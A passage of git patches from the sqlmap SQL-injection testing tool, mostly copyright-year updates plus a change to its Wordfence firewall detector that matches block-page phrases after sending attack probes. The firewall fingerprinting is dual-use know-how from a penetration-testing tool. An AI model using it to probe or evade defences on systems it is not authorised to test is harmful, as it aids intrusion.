@@ cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py 7d6edc552e08c30f4f4d49fa93b746f1 lib/core/optiondict.py -9e12c63430c653970cbc4c6bc6984784 lib/core/option.py +b75d17fef2c6675b53a8874484ea771f lib/core/option.py c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 6783160150b4711d02c56ee2beadffdb lib/core/profiling.py 6f654e1715571eff68a0f8af3d62dcf8 lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -ee218563ec023478311e55a30e2ea443 lib/core/settings.py +029c708c75256a97c39c14e24e62ba08 lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py From 12427ff6f87e6aeb762b82617d70bdf71b1970ed Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sat, 5 Jan 2019 21:29:59 +0100 Subject: [PATCH 424/428] Minor update --- waf/wordfence.py | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/waf/wordfence.py b/waf/wordfence.py index 0a941c9245f..dadb8151fa4 100644 --- a/waf/wordfence.py +++ b/waf/wordfence.py @@ -16,8 +16,7 @@ def detect(get_page): for vector in WAF_ATTACK_VECTORS: page, _, _ = get_page(get=vector) - retval = re.search(r"This response was generated by Wordfence", page or "", re.I) is not None - retval |= re.search(r"Your access to this site has been limited", page or "", re.I) is not None + retval = any(_ in (page or "") for _ in ("A potentially unsafe operation has been detected in your request to this site", "Generated by Wordfence", "Your access to this site has been limited", "This response was generated by Wordfence")) if retval: break From 590e8ed5aef8cb0b47ef85ebc3819be6c7f282bc Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sat, 5 Jan 2019 21:38:52 +0100 Subject: [PATCH 425/428] update_copyright_year() --- LICENSE | 2 +- extra/__init__.py | 2 +- extra/beep/__init__.py | 2 +- extra/beep/beep.py | 2 +- extra/cloak/__init__.py | 2 +- extra/cloak/cloak.py | 2 +- extra/dbgtool/__init__.py | 2 +- extra/dbgtool/dbgtool.py | 2 +- extra/safe2bin/__init__.py | 2 +- extra/safe2bin/safe2bin.py | 2 +- extra/shutils/duplicates.py | 2 +- extra/shutils/pycodestyle.sh | 2 +- extra/shutils/pypi.sh | 4 ++-- extra/shutils/regressiontest.py | 2 +- extra/sqlharvest/__init__.py | 2 +- extra/sqlharvest/sqlharvest.py | 2 +- extra/wafdetectify/__init__.py | 2 +- extra/wafdetectify/wafdetectify.py | 2 +- lib/__init__.py | 2 +- lib/controller/__init__.py | 2 +- lib/controller/action.py | 2 +- lib/controller/checks.py | 2 +- lib/controller/controller.py | 2 +- lib/controller/handler.py | 2 +- lib/core/__init__.py | 2 +- lib/core/agent.py | 2 +- lib/core/bigarray.py | 2 +- lib/core/common.py | 2 +- lib/core/convert.py | 2 +- lib/core/data.py | 2 +- lib/core/datatype.py | 2 +- lib/core/decorators.py | 2 +- lib/core/defaults.py | 2 +- lib/core/dicts.py | 2 +- lib/core/dump.py | 2 +- lib/core/enums.py | 2 +- lib/core/exception.py | 2 +- lib/core/log.py | 2 +- lib/core/option.py | 2 +- lib/core/optiondict.py | 2 +- lib/core/patch.py | 2 +- lib/core/profiling.py | 2 +- lib/core/readlineng.py | 2 +- lib/core/replication.py | 2 +- lib/core/revision.py | 2 +- lib/core/session.py | 2 +- lib/core/settings.py | 2 +- lib/core/shell.py | 2 +- lib/core/subprocessng.py | 2 +- lib/core/target.py | 2 +- lib/core/testing.py | 2 +- lib/core/threads.py | 2 +- lib/core/unescaper.py | 2 +- lib/core/update.py | 2 +- lib/core/wordlist.py | 2 +- lib/parse/__init__.py | 2 +- lib/parse/banner.py | 2 +- lib/parse/cmdline.py | 2 +- lib/parse/configfile.py | 2 +- lib/parse/handler.py | 2 +- lib/parse/headers.py | 2 +- lib/parse/html.py | 2 +- lib/parse/payloads.py | 2 +- lib/parse/sitemap.py | 2 +- lib/request/__init__.py | 2 +- lib/request/basic.py | 2 +- lib/request/basicauthhandler.py | 2 +- lib/request/comparison.py | 2 +- lib/request/connect.py | 2 +- lib/request/direct.py | 2 +- lib/request/dns.py | 2 +- lib/request/httpshandler.py | 2 +- lib/request/inject.py | 2 +- lib/request/methodrequest.py | 2 +- lib/request/pkihandler.py | 2 +- lib/request/rangehandler.py | 2 +- lib/request/redirecthandler.py | 2 +- lib/request/templates.py | 2 +- lib/takeover/__init__.py | 2 +- lib/takeover/abstraction.py | 2 +- lib/takeover/icmpsh.py | 2 +- lib/takeover/metasploit.py | 2 +- lib/takeover/registry.py | 2 +- lib/takeover/udf.py | 2 +- lib/takeover/web.py | 2 +- lib/takeover/xp_cmdshell.py | 2 +- lib/techniques/__init__.py | 2 +- lib/techniques/blind/__init__.py | 2 +- lib/techniques/blind/inference.py | 2 +- lib/techniques/dns/__init__.py | 2 +- lib/techniques/dns/test.py | 2 +- lib/techniques/dns/use.py | 2 +- lib/techniques/error/__init__.py | 2 +- lib/techniques/error/use.py | 2 +- lib/techniques/union/__init__.py | 2 +- lib/techniques/union/test.py | 2 +- lib/techniques/union/use.py | 2 +- lib/utils/__init__.py | 2 +- lib/utils/api.py | 2 +- lib/utils/brute.py | 2 +- lib/utils/crawler.py | 2 +- lib/utils/deps.py | 2 +- lib/utils/getch.py | 2 +- lib/utils/har.py | 2 +- lib/utils/hash.py | 2 +- lib/utils/hashdb.py | 2 +- lib/utils/htmlentities.py | 2 +- lib/utils/pivotdumptable.py | 2 +- lib/utils/progress.py | 2 +- lib/utils/purge.py | 2 +- lib/utils/search.py | 2 +- lib/utils/sqlalchemy.py | 2 +- lib/utils/timeout.py | 2 +- lib/utils/versioncheck.py | 2 +- lib/utils/xrange.py | 2 +- plugins/__init__.py | 2 +- plugins/dbms/__init__.py | 2 +- plugins/dbms/access/__init__.py | 2 +- plugins/dbms/access/connector.py | 2 +- plugins/dbms/access/enumeration.py | 2 +- plugins/dbms/access/filesystem.py | 2 +- plugins/dbms/access/fingerprint.py | 2 +- plugins/dbms/access/syntax.py | 2 +- plugins/dbms/access/takeover.py | 2 +- plugins/dbms/db2/__init__.py | 2 +- plugins/dbms/db2/connector.py | 2 +- plugins/dbms/db2/enumeration.py | 2 +- plugins/dbms/db2/filesystem.py | 2 +- plugins/dbms/db2/fingerprint.py | 2 +- plugins/dbms/db2/syntax.py | 2 +- plugins/dbms/db2/takeover.py | 2 +- plugins/dbms/firebird/__init__.py | 2 +- plugins/dbms/firebird/connector.py | 2 +- plugins/dbms/firebird/enumeration.py | 2 +- plugins/dbms/firebird/filesystem.py | 2 +- plugins/dbms/firebird/fingerprint.py | 2 +- plugins/dbms/firebird/syntax.py | 2 +- plugins/dbms/firebird/takeover.py | 2 +- plugins/dbms/h2/__init__.py | 2 +- plugins/dbms/h2/connector.py | 2 +- plugins/dbms/h2/enumeration.py | 2 +- plugins/dbms/h2/filesystem.py | 2 +- plugins/dbms/h2/fingerprint.py | 2 +- plugins/dbms/h2/syntax.py | 2 +- plugins/dbms/h2/takeover.py | 2 +- plugins/dbms/hsqldb/__init__.py | 2 +- plugins/dbms/hsqldb/connector.py | 2 +- plugins/dbms/hsqldb/enumeration.py | 2 +- plugins/dbms/hsqldb/filesystem.py | 2 +- plugins/dbms/hsqldb/fingerprint.py | 2 +- plugins/dbms/hsqldb/syntax.py | 2 +- plugins/dbms/hsqldb/takeover.py | 2 +- plugins/dbms/informix/__init__.py | 2 +- plugins/dbms/informix/connector.py | 2 +- plugins/dbms/informix/enumeration.py | 2 +- plugins/dbms/informix/filesystem.py | 2 +- plugins/dbms/informix/fingerprint.py | 2 +- plugins/dbms/informix/syntax.py | 2 +- plugins/dbms/informix/takeover.py | 2 +- plugins/dbms/maxdb/__init__.py | 2 +- plugins/dbms/maxdb/connector.py | 2 +- plugins/dbms/maxdb/enumeration.py | 2 +- plugins/dbms/maxdb/filesystem.py | 2 +- plugins/dbms/maxdb/fingerprint.py | 2 +- plugins/dbms/maxdb/syntax.py | 2 +- plugins/dbms/maxdb/takeover.py | 2 +- plugins/dbms/mssqlserver/__init__.py | 2 +- plugins/dbms/mssqlserver/connector.py | 2 +- plugins/dbms/mssqlserver/enumeration.py | 2 +- plugins/dbms/mssqlserver/filesystem.py | 2 +- plugins/dbms/mssqlserver/fingerprint.py | 2 +- plugins/dbms/mssqlserver/syntax.py | 2 +- plugins/dbms/mssqlserver/takeover.py | 2 +- plugins/dbms/mysql/__init__.py | 2 +- plugins/dbms/mysql/connector.py | 2 +- plugins/dbms/mysql/enumeration.py | 2 +- plugins/dbms/mysql/filesystem.py | 2 +- plugins/dbms/mysql/fingerprint.py | 2 +- plugins/dbms/mysql/syntax.py | 2 +- plugins/dbms/mysql/takeover.py | 2 +- plugins/dbms/oracle/__init__.py | 2 +- plugins/dbms/oracle/connector.py | 2 +- plugins/dbms/oracle/enumeration.py | 2 +- plugins/dbms/oracle/filesystem.py | 2 +- plugins/dbms/oracle/fingerprint.py | 2 +- plugins/dbms/oracle/syntax.py | 2 +- plugins/dbms/oracle/takeover.py | 2 +- plugins/dbms/postgresql/__init__.py | 2 +- plugins/dbms/postgresql/connector.py | 2 +- plugins/dbms/postgresql/enumeration.py | 2 +- plugins/dbms/postgresql/filesystem.py | 2 +- plugins/dbms/postgresql/fingerprint.py | 2 +- plugins/dbms/postgresql/syntax.py | 2 +- plugins/dbms/postgresql/takeover.py | 2 +- plugins/dbms/sqlite/__init__.py | 2 +- plugins/dbms/sqlite/connector.py | 2 +- plugins/dbms/sqlite/enumeration.py | 2 +- plugins/dbms/sqlite/filesystem.py | 2 +- plugins/dbms/sqlite/fingerprint.py | 2 +- plugins/dbms/sqlite/syntax.py | 2 +- plugins/dbms/sqlite/takeover.py | 2 +- plugins/dbms/sybase/__init__.py | 2 +- plugins/dbms/sybase/connector.py | 2 +- plugins/dbms/sybase/enumeration.py | 2 +- plugins/dbms/sybase/filesystem.py | 2 +- plugins/dbms/sybase/fingerprint.py | 2 +- plugins/dbms/sybase/syntax.py | 2 +- plugins/dbms/sybase/takeover.py | 2 +- plugins/generic/__init__.py | 2 +- plugins/generic/connector.py | 2 +- plugins/generic/custom.py | 2 +- plugins/generic/databases.py | 2 +- plugins/generic/entries.py | 2 +- plugins/generic/enumeration.py | 2 +- plugins/generic/filesystem.py | 2 +- plugins/generic/fingerprint.py | 2 +- plugins/generic/misc.py | 2 +- plugins/generic/search.py | 2 +- plugins/generic/syntax.py | 2 +- plugins/generic/takeover.py | 2 +- plugins/generic/users.py | 2 +- sqlmap.py | 2 +- sqlmapapi.py | 2 +- tamper/0x2char.py | 2 +- tamper/__init__.py | 2 +- tamper/apostrophemask.py | 2 +- tamper/apostrophenullencode.py | 2 +- tamper/appendnullbyte.py | 2 +- tamper/base64encode.py | 2 +- tamper/between.py | 2 +- tamper/bluecoat.py | 2 +- tamper/chardoubleencode.py | 2 +- tamper/charencode.py | 2 +- tamper/charunicodeencode.py | 2 +- tamper/charunicodeescape.py | 2 +- tamper/commalesslimit.py | 2 +- tamper/commalessmid.py | 2 +- tamper/commentbeforeparentheses.py | 2 +- tamper/concat2concatws.py | 2 +- tamper/equaltolike.py | 2 +- tamper/escapequotes.py | 2 +- tamper/greatest.py | 2 +- tamper/halfversionedmorekeywords.py | 2 +- tamper/htmlencode.py | 2 +- tamper/ifnull2casewhenisnull.py | 2 +- tamper/ifnull2ifisnull.py | 2 +- tamper/informationschemacomment.py | 2 +- tamper/least.py | 2 +- tamper/lowercase.py | 2 +- tamper/luanginx.py | 2 +- tamper/modsecurityversioned.py | 2 +- tamper/modsecurityzeroversioned.py | 2 +- tamper/multiplespaces.py | 2 +- tamper/overlongutf8.py | 2 +- tamper/overlongutf8more.py | 2 +- tamper/percentage.py | 2 +- tamper/plus2concat.py | 2 +- tamper/plus2fnconcat.py | 2 +- tamper/randomcase.py | 2 +- tamper/randomcomments.py | 2 +- tamper/sp_password.py | 2 +- tamper/space2comment.py | 2 +- tamper/space2dash.py | 2 +- tamper/space2hash.py | 2 +- tamper/space2morecomment.py | 2 +- tamper/space2morehash.py | 2 +- tamper/space2mssqlblank.py | 2 +- tamper/space2mssqlhash.py | 2 +- tamper/space2mysqlblank.py | 2 +- tamper/space2mysqldash.py | 2 +- tamper/space2plus.py | 2 +- tamper/space2randomblank.py | 2 +- tamper/symboliclogical.py | 2 +- tamper/unionalltounion.py | 2 +- tamper/unmagicquotes.py | 2 +- tamper/uppercase.py | 2 +- tamper/varnish.py | 2 +- tamper/versionedkeywords.py | 2 +- tamper/versionedmorekeywords.py | 2 +- tamper/xforwardedfor.py | 2 +- txt/common-columns.txt | 2 +- txt/common-outputs.txt | 2 +- txt/common-tables.txt | 2 +- txt/keywords.txt | 2 +- txt/user-agents.txt | 2 +- waf/360.py | 2 +- waf/__init__.py | 2 +- waf/aesecure.py | 2 +- waf/airlock.py | 2 +- waf/anquanbao.py | 2 +- waf/approach.py | 2 +- waf/armor.py | 2 +- waf/asm.py | 2 +- waf/aws.py | 2 +- waf/baidu.py | 2 +- waf/barracuda.py | 2 +- waf/bigip.py | 2 +- waf/binarysec.py | 2 +- waf/blockdos.py | 2 +- waf/bluedon.py | 2 +- waf/chinacache.py | 2 +- waf/ciscoacexml.py | 2 +- waf/cloudbric.py | 2 +- waf/cloudflare.py | 2 +- waf/cloudfront.py | 2 +- waf/comodo.py | 2 +- waf/crawlprotect.py | 2 +- waf/datapower.py | 2 +- waf/denyall.py | 2 +- waf/distil.py | 2 +- waf/dosarrest.py | 2 +- waf/dotdefender.py | 2 +- waf/edgecast.py | 2 +- waf/expressionengine.py | 2 +- waf/fortiweb.py | 2 +- waf/generic.py | 2 +- waf/hyperguard.py | 2 +- waf/incapsula.py | 2 +- waf/isaserver.py | 2 +- waf/jiasule.py | 2 +- waf/knownsec.py | 2 +- waf/kona.py | 2 +- waf/modsecurity.py | 2 +- waf/naxsi.py | 2 +- waf/netcontinuum.py | 2 +- waf/netscaler.py | 2 +- waf/newdefend.py | 2 +- waf/nsfocus.py | 2 +- waf/paloalto.py | 2 +- waf/profense.py | 2 +- waf/proventia.py | 2 +- waf/radware.py | 2 +- waf/reblaze.py | 2 +- waf/requestvalidationmode.py | 2 +- waf/safe3.py | 2 +- waf/safedog.py | 2 +- waf/secureiis.py | 2 +- waf/senginx.py | 2 +- waf/sitelock.py | 2 +- waf/sonicwall.py | 2 +- waf/sophos.py | 2 +- waf/stingray.py | 2 +- waf/sucuri.py | 2 +- waf/tencent.py | 2 +- waf/teros.py | 2 +- waf/trafficshield.py | 2 +- waf/urlscan.py | 2 +- waf/uspses.py | 2 +- waf/varnish.py | 2 +- waf/wallarm.py | 2 +- waf/watchguard.py | 2 +- waf/webappsecure.py | 2 +- waf/webknight.py | 2 +- waf/wordfence.py | 2 +- waf/yundun.py | 2 +- waf/yunsuo.py | 2 +- waf/zenedge.py | 2 +- 357 files changed, 358 insertions(+), 358 deletions(-) diff --git a/LICENSE b/LICENSE index 5fa92b72813..da63e45d6bb 100644 --- a/LICENSE +++ b/LICENSE @@ -1,7 +1,7 @@ COPYING -- Describes the terms under which sqlmap is distributed. A copy of the GNU General Public License (GPL) is appended to this file. -sqlmap is (C) 2006-2018 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar. +sqlmap is (C) 2006-2019 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar. This program is free software; you may redistribute and/or modify it under the terms of the GNU General Public License as published by the Free diff --git a/extra/__init__.py b/extra/__init__.py index 7181b22a163..c654cbef7f4 100644 --- a/extra/__init__.py +++ b/extra/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/extra/beep/__init__.py b/extra/beep/__init__.py index 7181b22a163..c654cbef7f4 100644 --- a/extra/beep/__init__.py +++ b/extra/beep/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/extra/beep/beep.py b/extra/beep/beep.py index 521ef2bf1cb..2379222dcb8 100644 --- a/extra/beep/beep.py +++ b/extra/beep/beep.py @@ -3,7 +3,7 @@ """ beep.py - Make a beep sound -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/extra/cloak/__init__.py b/extra/cloak/__init__.py index 7181b22a163..c654cbef7f4 100644 --- a/extra/cloak/__init__.py +++ b/extra/cloak/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/extra/cloak/cloak.py b/extra/cloak/cloak.py index cc95e5a992f..79d42dba03b 100644 --- a/extra/cloak/cloak.py +++ b/extra/cloak/cloak.py @@ -3,7 +3,7 @@ """ cloak.py - Simple file encryption/compression utility -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/extra/dbgtool/__init__.py b/extra/dbgtool/__init__.py index 7181b22a163..c654cbef7f4 100644 --- a/extra/dbgtool/__init__.py +++ b/extra/dbgtool/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/extra/dbgtool/dbgtool.py b/extra/dbgtool/dbgtool.py index 9a27a60b4a2..fa65d448bb7 100644 --- a/extra/dbgtool/dbgtool.py +++ b/extra/dbgtool/dbgtool.py @@ -3,7 +3,7 @@ """ dbgtool.py - Portable executable to ASCII debug script converter -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/extra/safe2bin/__init__.py b/extra/safe2bin/__init__.py index 7181b22a163..c654cbef7f4 100644 --- a/extra/safe2bin/__init__.py +++ b/extra/safe2bin/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/extra/safe2bin/safe2bin.py b/extra/safe2bin/safe2bin.py index 19c9784a992..c426c124be5 100644 --- a/extra/safe2bin/safe2bin.py +++ b/extra/safe2bin/safe2bin.py @@ -3,7 +3,7 @@ """ safe2bin.py - Simple safe(hex) to binary format converter -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/extra/shutils/duplicates.py b/extra/shutils/duplicates.py index 1795299b3de..e56c96cbe5d 100755 --- a/extra/shutils/duplicates.py +++ b/extra/shutils/duplicates.py @@ -1,6 +1,6 @@ #!/usr/bin/env python -# Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +# Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) # See the file 'LICENSE' for copying permission # Removes duplicate entries in wordlist like files diff --git a/extra/shutils/pycodestyle.sh b/extra/shutils/pycodestyle.sh index 79ab95743ce..53acf30f9a2 100755 --- a/extra/shutils/pycodestyle.sh +++ b/extra/shutils/pycodestyle.sh @@ -1,6 +1,6 @@ #!/bin/bash -# Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +# Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) # See the file 'LICENSE' for copying permission # Runs pycodestyle on all python files (prerequisite: pip install pycodestyle) diff --git a/extra/shutils/pypi.sh b/extra/shutils/pypi.sh index aa1ad0aab53..c6aa06d0bcf 100755 --- a/extra/shutils/pypi.sh +++ b/extra/shutils/pypi.sh @@ -16,7 +16,7 @@ cat > $TMP_DIR/setup.py << EOF #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ @@ -61,7 +61,7 @@ cat > sqlmap/__init__.py << EOF #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/extra/shutils/regressiontest.py b/extra/shutils/regressiontest.py index 6d8fb5acd09..9a8ecde597b 100755 --- a/extra/shutils/regressiontest.py +++ b/extra/shutils/regressiontest.py @@ -1,6 +1,6 @@ #!/usr/bin/env python -# Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +# Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) # See the file 'LICENSE' for copying permission import codecs diff --git a/extra/sqlharvest/__init__.py b/extra/sqlharvest/__init__.py index 7181b22a163..c654cbef7f4 100644 --- a/extra/sqlharvest/__init__.py +++ b/extra/sqlharvest/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/extra/sqlharvest/sqlharvest.py b/extra/sqlharvest/sqlharvest.py index 7c7aa56ed93..21ec3291cfd 100644 --- a/extra/sqlharvest/sqlharvest.py +++ b/extra/sqlharvest/sqlharvest.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/extra/wafdetectify/__init__.py b/extra/wafdetectify/__init__.py index 7181b22a163..c654cbef7f4 100644 --- a/extra/wafdetectify/__init__.py +++ b/extra/wafdetectify/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/extra/wafdetectify/wafdetectify.py b/extra/wafdetectify/wafdetectify.py index 014854d52cd..3842ad23738 100644 --- a/extra/wafdetectify/wafdetectify.py +++ b/extra/wafdetectify/wafdetectify.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/__init__.py b/lib/__init__.py index 7181b22a163..c654cbef7f4 100644 --- a/lib/__init__.py +++ b/lib/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/controller/__init__.py b/lib/controller/__init__.py index 7181b22a163..c654cbef7f4 100644 --- a/lib/controller/__init__.py +++ b/lib/controller/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/controller/action.py b/lib/controller/action.py index a4de8dffdc3..933057a5701 100644 --- a/lib/controller/action.py +++ b/lib/controller/action.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/controller/checks.py b/lib/controller/checks.py index 05bfd6cd93d..63194d46b10 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/controller/controller.py b/lib/controller/controller.py index 7b5ee9ce043..45924c6264f 100644 --- a/lib/controller/controller.py +++ b/lib/controller/controller.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/controller/handler.py b/lib/controller/handler.py index 2ff64ea2a07..9fb0cda6e4e 100644 --- a/lib/controller/handler.py +++ b/lib/controller/handler.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/__init__.py b/lib/core/__init__.py index 7181b22a163..c654cbef7f4 100644 --- a/lib/core/__init__.py +++ b/lib/core/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/agent.py b/lib/core/agent.py index f95e92dddeb..19b6a07b735 100644 --- a/lib/core/agent.py +++ b/lib/core/agent.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/bigarray.py b/lib/core/bigarray.py index b99c6f98074..8d816a2dd87 100644 --- a/lib/core/bigarray.py +++ b/lib/core/bigarray.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/common.py b/lib/core/common.py index 502e60fca36..0aa977cc66f 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/convert.py b/lib/core/convert.py index fcd0d277c71..e931d81ecee 100644 --- a/lib/core/convert.py +++ b/lib/core/convert.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/data.py b/lib/core/data.py index 63cd4e8d971..3a56c7fb4c5 100644 --- a/lib/core/data.py +++ b/lib/core/data.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/datatype.py b/lib/core/datatype.py index 85238cd06f6..079222d1aa8 100644 --- a/lib/core/datatype.py +++ b/lib/core/datatype.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/decorators.py b/lib/core/decorators.py index ae3635ca603..3ceaa55c917 100644 --- a/lib/core/decorators.py +++ b/lib/core/decorators.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/defaults.py b/lib/core/defaults.py index 6c12164a155..95a7f3ff421 100644 --- a/lib/core/defaults.py +++ b/lib/core/defaults.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/dicts.py b/lib/core/dicts.py index 242599e69af..e80f3d9a033 100644 --- a/lib/core/dicts.py +++ b/lib/core/dicts.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/dump.py b/lib/core/dump.py index 444152e8471..6aff9345702 100644 --- a/lib/core/dump.py +++ b/lib/core/dump.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/enums.py b/lib/core/enums.py index 